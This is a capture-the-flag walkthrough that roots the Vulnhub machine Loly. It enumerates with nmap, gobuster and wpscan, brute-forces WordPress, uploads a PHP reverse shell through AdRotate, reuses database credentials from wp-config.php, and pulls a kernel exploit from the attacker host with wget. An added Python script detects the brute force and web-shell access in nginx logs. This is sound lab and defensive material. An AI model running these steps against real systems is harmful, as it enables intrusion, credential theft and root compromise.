[VULNHUB] Loly

Today we are going to hack the Vulnhub machine called Loly. You can download it from the following link: https://www.vulnhub.com/entry/loly-1,538/
Enumeration

We start with an nmap scan to see which ports are open.

    sml@aLiCe:~$ nmap -A -p- 192.168.146.132
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 22:03 CEST
    Nmap scan report for 192.168.146.132
    Host is up (0.00072s latency).
    Not shown: 65534 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    nginx 1.10.3 (Ubuntu)
    |_http-server-header: nginx/1.10.3 (Ubuntu)
    |_http-title: Welcome to nginx!
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds

Only port 80 is open, so we explore it a bit further.

    sml@aLiCe:~$ gobuster dir -u http://192.168.146.132 -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.146.132
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/09/12 22:05:56 Starting gobuster
    ===============================================================
    /wordpress (Status: 301)
    ===============================================================
    2020/09/12 22:05:58 Finished
    ===============================================================

There is a "wordpress" directory. We enumerate its users with:

    wpscan --url http://192.168.146.132/wordpress --enumerate -u

The user "loly" shows up. We brute-force the user loly to see whether we can get the password and log in to WordPress.

    sml@aLiCe:~$ wpscan --url http://192.168.146.132/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt
    _______________________________________________________________
             WordPress Security Scanner by the WPScan Team
                             Version 3.8.2
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://192.168.146.132/wordpress/ [192.168.146.132]
    [+] Started: Sat Sep 12 22:10:43 2020

    Interesting Finding(s):

    [+] Headers
     | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.146.132/wordpress/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

    [+] http://192.168.146.132/wordpress/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%

    [+] Enumerating Config Backups (via Passive and Aggressive Methods)
     Checking Config Backups - Time: 00:00:00 <======================================> (21 / 21) 100.00% Time: 00:00:00
    [i] No Config Backups Found.

    [+] Performing password attack on Xmlrpc against 1 user/s
    [SUCCESS] - loly / fernando
    Trying loly / corazon Time: 00:00:01 <=========================================> (175 / 175) 100.00% Time: 00:00:01

    [!] Valid Combinations Found:
     | Username: loly, Password: fernando

    [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
    [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

    [+] Finished: Sat Sep 12 22:11:00 2020
    [+] Requests Done: 200
    [+] Cached Requests: 25
    [+] Data Sent: 96.89 KB
    [+] Data Received: 109.146 KB
    [+] Memory used: 951.316 MB
    [+] Elapsed time: 00:00:17

We found the password: fernando. When we browse to http://192.168.146.132/wordpress/wp-admin we are redirected to loly.lc, so we add loly.lc to our /etc/hosts file. Once that is done, we log in to WordPress with the credentials. The AdRotate plugin is installed; we go to AdRotate -> Manage Media. On our machine we prepare a PHP reverse shell and then compress it as a .zip file.

    sml@aLiCe:~$ cp /usr/share/webshell/php/php-reverse-shell.php .
    sml@aLiCe:~$ mv php-reverse-shell.php rshell.php
    sml@aLiCe:~$ nano rshell.php
    sml@aLiCe:~$ zip rshell.zip rshell.php
      adding: rshell.php (deflated 59%)
    sml@aLiCe:~$

We upload the .zip file through AdRotate Manage Media and start nc listening:

    sml@aLiCe:~$ nc -nlvp 1234
    listening on [any] 1234 ...

Then we browse to: http://loly.lc/wordpress/wp-content/banners/rshell.php
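From the defender's side, two things in this section are cheap to catch in the nginx access log: the XML-RPC password guessing (each wpscan guess is one POST to xmlrpc.php, 175 of them in about a second here) and a .php file being executed out of the AdRotate banners directory, which should only ever serve images. The script below is an added example of mine, not part of the original walkthrough; the log lines it parses are constructed, and the 20-requests-per-minute threshold is an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed nginx access-log sample (not from the original post): 25 XML-RPC
# POSTs in ~12 s from one client, two normal requests, then a PHP hit in banners/.
SAMPLE_LOG = [
    f'192.168.146.131 - - [12/Sep/2020:22:10:{43 + i // 2:02d} +0200] '
    '"POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.2"'
    for i in range(25)
] + [
    '10.0.0.7 - - [12/Sep/2020:22:10:50 +0200] "GET /wordpress/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Sep/2020:22:10:51 +0200] "GET /wordpress/wp-content/banners/ad.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.146.131 - - [12/Sep/2020:22:15:02 +0200] "GET /wordpress/wp-content/banners/rshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"].split("?", 1)[0]

def find_xmlrpc_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map client IP -> peak number of POSTs to xmlrpc.php seen inside any sliding
    `window`, for clients that exceed `threshold` (each wpscan guess is one POST)."""
    recent, peaks = defaultdict(deque), {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec[2] != "POST" or not rec[3].endswith("/xmlrpc.php"):
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:       # drop guesses that fell out of the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

BANNER_PHP_RE = re.compile(r"/wp-content/banners/[^/]+\.php$", re.IGNORECASE)

def find_banner_php_hits(lines):
    """List (ip, path) for requests executing a .php file in the banners directory: a strong web-shell indicator."""
    return [(rec[0], rec[3]) for rec in map(parse_line, lines)
            if rec and BANNER_PHP_RE.search(rec[3])]
```

The same two checks are what an nginx rate limit on xmlrpc.php and a "no PHP under wp-content/banners" location rule would prevent; the script only detects them after the fact.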
Low Shell

    sml@aLiCe:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.146.131] from (UNKNOWN) [192.168.146.132] 59286
    Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
     13:47:01 up 44 min,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'

We explore the system and look at the wp-config.php file in the WordPress directory to see whether it gives us any credentials.

    www-data@ubuntu:/$ cat /var/www/html/wordpress/wp-config.php
    ---SNIP---
    /** MySQL database username */
    define( 'DB_USER', 'wordpress' );

    /** MySQL database password */
    define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
    ---SNIP---

We found a password :) The system has a user called loly, so we try to log in as loly with the password we just found.

    su loly
    Password: lolyisabeautifulgirl
    loly@ubuntu:~$

We are loly now! We keep exploring the system.

    loly@ubuntu:~$ cat /etc/issue
    Ubuntu 16.04.1 LTS \n \l
    loly@ubuntu:~$ uname -a
    Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Privilege Escalation

It is Ubuntu 16.04 with kernel 4.4.0-31. We search for an exploit and find one [1]. We download it to our machine and transfer it to the victim.

    loly@ubuntu:~$ wget http://192.168.146.131/45010.c
    wget http://192.168.146.131/45010.c
    --2020-09-12 15:05:47--  http://192.168.146.131/45010.c
    Connecting to 192.168.146.131:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 13728 (13K) [application/octet-stream]
    Saving to: ‘45010.c’

    45010.c             100%[===================>]  13.41K  --.-KB/s    in 0s

    2020-09-12 15:05:47 (443 MB/s) - ‘45010.c’ saved [13728/13728]

We compile it.

    loly@ubuntu:~$ gcc -o 4 45010.c

And run it!

    loly@ubuntu:~$ ./4
    ./4
    [.]
    [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
    [.]
    [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
    [.]
    [*] creating bpf map
    [*] sneaking evil bpf past the verifier
    [*] creating socketpair()
    [*] attaching bpf backdoor to socket
    [*] skbuff => ffff88007973af00
    [*] Leaking sock struct from ffff880075daddc0
    [*] Sock->sk_rcvtimeo at offset 472
    [*] Cred structure at ffff880072e50840
    [*] UID from cred structure: 1000, matches the current: 1000
    [*] hammering cred structure at ffff880072e50840
    [*] credentials patched, launching shell...
    # id
    id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
root.txt

    # cd /root
    # ls
    root.txt
    # cat root.txt
    (ASCII-art banner)
    Congratulations. I'm BigCityBoy

End

And with that we are root on the machine.

[1] https://www.exploit-db.com/exploits/45010